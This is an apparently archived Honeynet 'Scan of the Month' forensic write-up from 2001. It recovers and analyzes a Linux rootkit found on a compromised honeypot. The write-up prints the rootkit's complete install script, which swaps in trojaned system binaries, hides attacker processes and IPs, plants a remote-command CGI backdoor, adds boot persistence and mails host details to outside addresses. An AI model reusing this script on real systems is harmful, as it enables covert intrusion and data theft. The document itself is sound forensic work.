From gmeltser@atstake.com Tue May 22 22:39:18 2001 Date: Tue, 15 May 2001 11:49:49 -0500 From: Gene Meltser To: project@honeynet.org Subject: Honeynet "Scan of the month" #15 submission Lance, Here i my submission of analysis for the Scan of the month #15. The recovered rootkit tarball lk.tgz is included in the email. Gene Meltser @stake [ Part 2: "Attached Text" ] Honeynet Scan of the Month #15 Linux rootkit compromise TOC -------------------------------------- @ Introduction @ Tools Used @ Analysis --------------------------------------- @ Introduction On March 15, 2001 a Linux honeypot was successfully compromised, on which a rootkit was downloaded and deleted. The goal is to find and recover the deleted rootkit while showing steps how the rootkit was identified and recovered. Further, the goal is to show which files comprise the deleted rootkit. The analysis began by downloading the honeynet.tar.gz file, verifying the md5 hash, uncompressing the image and verifying the hash again. The resulting filesystem layout, as well as the md5 hashes are as follows: honeypot.hda8.dd / MD5 Hashes: MD5 (honeynet.tar.gz) = 0dff8fb9fe022ea80d8f1a4e4ae33e21 MD5 (honeypot.hda8.dd) = 5a8ebf5725b15e563c825be85f2f852e The resulting file, honeypot.hda8.dd was mounted read-only on a RedHat 7.0 system: #mount -o ro,nodev,noexec,loop /honeypot.hda8.dd /linux All of the analysis was performed on the resulted mounted filesystem under /linux, and the honeypot.hda8.dd image file. @ Tools The tools used in the analysis: The Coroner's Toolkit 1.06 by Wietse Venema - www.porcupine.org/forensics/tct.html TCTUTILs 1.00 by Brian Carrier - www.cerias.purdue.edu/homes/carrier/forensics/ Autopsy Forensic Browser by Brian Carrier - www.cerias.purdue.edu/homes/carrier/forensics/ Standard unix commands, such as strings(1), grep(1), etc. @Analysis The analysis began by installing and configuring TCT, TCTUTILs and the Autopsy Forensic Browser on the analysis machine, and accessing the honeypot.hda8.dd image through the Forensic Browser. Looking for deleted files on the image, an odd deleted file is noticed immediately under the / partition, called lk.tgz. Since we are looking for a deleted rootkit, files that are not a part of the OS are of interest to us. The file is recovered from inode 23 using icat: #tct-1.06/bin/icat -v honeypot.hda8.dd 23 > lk.tgz #file lk.tgz gzip compressed data, deflated, last modified: Fri Mar 2 22:09:06 2001, os: Unix # The file is compressed, and appears to be the original rootkit package, presumably downloaded by the intruder. Examining the recovered rootkit, it contains the following files: ----------------------------------------------------------------------------------------- /last drwxr-xr-x 2 1031 users 4096 May 10 01:46 . drwxr-xr-x 3 root root 4096 May 10 01:10 .. -rwxr-xr-x 1 1031 users 1345 Sep 9 1999 cleaner -rwxr-xr-x 1 1031 users 19840 Feb 26 10:23 ifconfig -rw-r--r-- 1 1031 users 3278 Jan 27 10:11 inetd.conf -rwx------ 1 1031 users 3713 Mar 2 22:08 install -rwxr-xr-x 1 1031 users 4620 Feb 26 10:23 last.cgi -rwx------ 1 1031 users 7165 Feb 26 10:22 linsniffer -rwx------ 1 1031 users 75 Feb 26 10:24 logclear -rwxr-xr-x 1 1031 users 79 Feb 26 10:28 lsattr -rwxr-xr-x 1 1031 users 632066 Feb 26 09:46 mkxfs -rwxr-xr-x 1 1031 users 35300 Feb 26 10:23 netstat -rw-r--r-- 1 1031 users 1 Feb 26 10:29 pidfile -rwxr-xr-x 1 1031 users 33280 Feb 26 10:23 ps -rw-r--r-- 1 root root 708 Mar 2 22:05 s -rwxr-xr-x 1 1031 users 4060 Feb 26 10:22 sense -rw-r--r-- 1 1031 users 11407 Jan 27 10:11 services -rwx------ 1 1031 users 8268 Feb 26 10:22 sl2 -rwxr-xr-x 1 1031 users 611931 Feb 8 2002 ssh -rw-r--r-- 1 1031 users 880 Oct 22 2000 ssh_config -rw------- 1 1031 users 540 Oct 22 2000 ssh_host_key -rw-r--r-- 1 1031 users 344 Oct 22 2000 ssh_host_key.pub -rw------- 1 1031 users 512 Oct 22 2000 ssh_random_seed -rw-r--r-- 1 1031 users 688 Feb 26 10:29 sshd_config -rwxr-xr-x 1 1031 users 53588 Feb 26 10:23 top ---------------------------------------------------------------------------------------- Generaly, a rootkit consists of the following components: 1. Log cleaner 2. Sniffer 3. Back door 4. Attack tools/modified system utilities Examining the files included in lk.tgz, we note the follwing suspicious components: cleaner: This is a shell script, that cleans the log files, erasing the evidence of the intrusion. Segment from cleaner script: . . . echo "${BLK}* ${DWHI}Cleaning logs.. This may take a bit depending on the size of the logs.${RES}" . . . linsniffer: This is the sniffer executalble, that logs network activity, and logs to a file called tcp.log, as evident by running linsniffer through strings(1): . . . tcp.log cant open log . . . Back Door: In this case, the back door possibly exists in last.cgi, which appears to be an executable with an HTTP front end, that possibly allows remote command execution. Partial results of running last.cgi through strings(1): . . . %s

%s


Command output: [%s]
. . . Attack tools/modified system binaries: The possible rootkit contains several binaries, that are installed by the installation script "install", (which is outlined below). The binaries installed in this process are listed and analyzed further below. The recovered installation script "install", included in lk.tgz is shown below: ---------------------------------------------------------------------------------------- #!/bin/sh clear unset HISTFILE echo "********* Instalarea Rootkitului A Pornit La Drum *********" echo "********* Mircea SUGI PULA ********************************" echo "********* Multumiri La Toti Care M-Au Ajutat **************" echo "********* Lemme Give You A Tip : **************************" echo "********* Ignore everything, call your freedom ************" echo "********* Scream & swear as much as you can ***************" echo "********* Cuz anyway nobody will hear you and no one will *" echo "********* Care about you **********************************" echo echo chown root.root * if [ -f /usr/bin/make ]; then echo "Are Make !" else echo "Nu Are Make !" fi if [ -f /usr/bin/gcc ]; then echo "Are Gcc !" else echo "Nu Are Gcc !" fi if [ -f /usr/sbin/sshd/ ]; then echo "Are Ssh !" else echo "Nu Are Ssh !" fi echo -n "* Inlocuim nestat ... alea alea " rm -rf /sbin/ifconfig mv ifconfig /sbin/ifconfig rm -rf /bin/netstat mv netstat /bin/netstat rM -rf /bin/ps mv ps /bin/ps rm -rf /usr/bin/top mv top /usr/bin/top cp -f mkxfs /usr/sbin/ echo "* Gata..." echo -n "* Dev... " echo echo touch /dev/rpm >/dev/rpm echo "3 sl2" >>/dev/rpm echo "3 sshdu" >>/dev/rpm echo "3 linsniffer" >>/dev/rpm echo "3 smurf" >>/dev/rpm echo "3 slice" >>/dev/rpm echo "3 mech" >>/dev/rpm echo "3 muh" >>/dev/rpm echo "3 bnc" >>/dev/rpm echo "3 psybnc" >> /dev/rpm touch /dev/last >/dev/last echo "1 193.231.139" >>/dev/last echo "1 213.154.137" >>/dev/last echo "1 193.254.34" >>/dev/last echo "3 48744" >>/dev/last echo "3 3666" >>/dev/last echo "3 31221" >>/dev/last echo "3 22546" >>/dev/last echo "4 48744" >>/dev/last echo "4 2222" >>/dev/last echo "* Gata" echo "* Facem Director...Si Mutam Alea.. " mkdir -p /dev/ida/.drag-on mkdir -p /dev/ida/".. " echo "* Copiem ssh si alea" cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/.drag-o n/ cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/".. " rm -rf linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed touch /dev/ida/.drag-on/tcp.log touch /dev/ida/".. "/tcp.log cp -f inetd.conf /etc cp -f services /etc killall -HUP inetd echo echo echo echo "* Adaugam In Startup:) ..." rm -rf /usr/bin/lsattr echo "/usr/bin/lsattr -t1 -X53 -p" >> /etc/rc.d/rc.sysinit echo >> /etc/rc.d/rc.sysinit cp -f lsattr /usr/bin/ chmod 500 /usr/bin/lsattr chattr +i /usr/bin/lsattr /usr/bin/lsattr sleep 1 if [ -d /home/httpd/cgi-bin ] then mv -f last.cgi /home/httpd/cgi-bin/ fi if [ -d /usr/local/httpd/cgi-bin ] then mv -f last.cgi /usr/local/httpd/cgi-bin/ fi if [ -d /usr/local/apache/cgi-bin ] then mv -f last.cgi /usr/local/apache/cgi-bin/ fi if [ -d /www/httpd/cgi-bin ] then mv -f last.cgi /www/httpd/cgi-bin/ fi if [ -d /www/cgi-bin ] then mv -f last.cgi /www/cgi-bin/ fi echo "* Luam Informatiile dorite ..." echo "* Info : $(uname -a)" >> computer echo "* Hostname : $(hostname -f)" >> computer echo "* IfConfig : $(/sbin/ifconfig | grep inet)" >> computer echo "* Uptime : $(uptime)" >> computer echo "* Cpu Vendor ID : $(cat /proc/cpuinfo|grep vendor_id)" >> computer echo "* Cpu Model : $(cat /proc/cpuinfo|grep model)" >> computer echo "* Cpu Speed: $(cat /proc/cpuinfo|grep MHz)" >> computer echo "* Bogomips: $(cat /proc/cpuinfo|grep bogomips)" >> computer echo "* Spatiu Liber: $(df -h)" >> computer echo "* Gata ! Trimitem Mailul ...Asteapta Te Rog " cat computer | mail -s "placinte" last@linuxmail.org cat computer | mail -s "roote" bidi_damm@yahoo.com echo "* Am trimis mailul ... stergem fisierele care nu mai trebuie ." echo echo echo "* G A T A *" echo echo "* That Was Nice Last " cd / rm -rf last lk.tgz computer lk.tar.gz ------------------------------------------------------------------------------------- This apperars to be a rootkit, because it exhibits the four characteristics of a rootkit defined above. Further, the installation script above exposes the context of use of the uncomressed binaries. Rootkit install replaces the follwing binaries with its trojaned binaries: /sbin/ifconfig /bin/netstat /bin/ps /usr/bin/top /etc/inetd.conf /etc/services /usr/bin/lsattr Install also adds: /usr/sbin/mkxfs /dev/rpm (resumably trojaned process file, more on that below..) dev/last (presumably allowed/denied/non-logged IPs for the backdoor, more on that below..) /home/httpd/cgi-bin/last.cgi (if directory exists) /usr/local/httpd/cgi-bin/last.cgi (if directory exists) /usr/local/apache/cgi-bin/last.cgi (if directory exists) /www/httpd/cgi-bin/last.cgi (if directory exists) /www/cgi-bin/last.cgi (if directory exists) The install script installs its binaries n both /dev/ida/.drag-on and /dev/ida/".. ", consisting of: linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed @ Bonus Question: Was the rootkit actually installed? How do you know? The rootkit was installed on the compromised system. Following the the rootkit's installation script, the following directories are found on the system, containing the trojaned binaries: /dev/ida/.. / /dev/ida/.drag-on/ Furthermore, closer examination of the potentialy trojaned binaries found on the system yields some more evidence of an installed rootkit. Below are some of the MD5 hashes of the original files included in lk.tgz, compared with files recovered from the honeypot.hda8.dd image: -------------------------------------------------------------------------------- FILE ORIGINAL FILE HASH HASH, AS FOUND ON IMAGE -------------------------------------------------------------------------------- cleaner 12e8748c19abe7a44e67196c22738e9b 12e8748c19abe7a44e67196c22738e9b ps 7728c15d89f27e376950f96a7510bf0f 7728c15d89f27e376950f96a7510bf0f top 8ff0939cd49a0b2ef3156c7876afca4b 8ff0939cd49a0b2ef3156c7876afca4b ifconfig086394958255553f6f38684dad97869e 086394958255553f6f38684dad97869e netstat 2b07576213c1c8b942451459b3dc4903 2b07576213c1c8b942451459b3dc4903 ssh 21ed3ca31a9c9b51a757f1644e26f2f7 21ed3ca31a9c9b51a757f1644e26f2f7 lsattr dfb2eeea2a5ba23eb6a2b9d0cff9d82f dfb2eeea2a5ba23eb6a2b9d0cff9d82f -------------------------------------------------------------------------------- Finding files from the lk.tgz archive on the filesystem is a good indication that the rootkit was installed on the compromised system. We also find /dev/last and /dev/rpm files on the compromised system, furthering our hypothesis that the rootkit was installed on the compromised system. The files are plain text files, applied in similar context as Linux Rootkit 4 ROOTKIT_ADDRESS_FILE and ROOTKIT_PROCESS_FILE. /dev/rpm contains what appears to be a list of binaries, presumably for trojaned operation of ps and top, as well as /dev/last containing a list of IPs, presumably for functionality of the back doors installed, where access to the compromised system through from/to the listed IPs and ports is not logged by the trojaned netstat. In further analysis, running the ps binary through strings, we notice that the binary is linked with Libc5. Sample output from running "strings | ps": #strings /linux/bin/ps | more /lib/ld-linux.so.1 -> libc.so.5 _DYNAMIC . . . Original binaries that come with RH6.2 distribution are linked with libc.so.6, thus indicating that this is a trojaned executable. Also, running the ifconfig binary through strings I notice that the string PROMISC is not present in the binary. This is a good indication that this is a trojaned binary, unable to report it is in promiscuous mode. Gene Meltser @stake 5/15/2001 [ Part 3, Application/OCTET-STREAM (Name: "lk.tgz") 713KB. ] [ Unable to print this part. ]